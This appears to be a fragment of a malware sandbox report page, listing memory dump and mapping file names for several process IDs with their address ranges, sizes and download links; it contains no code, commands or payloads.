memory/2792-185-0x0000000000100000-0x0000000000154000-memory.dmp

Filesize
336KB

Download
memory/2792-192-0x0000000002320000-0x000000000233E000-memory.dmp

Filesize
120KB

Download
memory/2792-182-0x0000000000000000-mapping.dmp

Download
memory/2792-188-0x0000000000A30000-0x0000000000A32000-memory.dmp

Filesize
8KB

Download
memory/3440-147-0x0000000000000000-mapping.dmp

Download
memory/3448-179-0x0000000000405CE2-mapping.dmp

Download
memory/3952-146-0x0000000000000000-mapping.dmp

Download
memory/4392-148-0x0000000000000000-mapping.dmp

Download
memory/4420-168-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4420-163-0x0000000000405CE2-mapping.dmp

Download
memory/4420-162-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4520-124-0x00007FFF65D30000-0x00007FFF65D40000-memory.dmp

Filesize
64KB

Download
memory/4520-128-0x00007FFF65D30000-0x00007FFF65D40000-memory.dmp

Filesize
64KB

Download
memory/4520-127-0x00007FFF65D30000-0x00007FFF65D40000-memory.dmp

Filesize
64KB

Download
memory/4520-126-0x00007FFF65D30000-0x00007FFF65D40000-memory.dmp

Filesize
64KB

Download
memory/4520-125-0x00007FFF65D30000-0x00007FFF65D40000-memory.dmp

Filesize
64KB

Download
memory/4716-150-0x0000000000000000-mapping.dmp

Download
memory/4788-158-0x0000000000000000-mapping.dmp

Download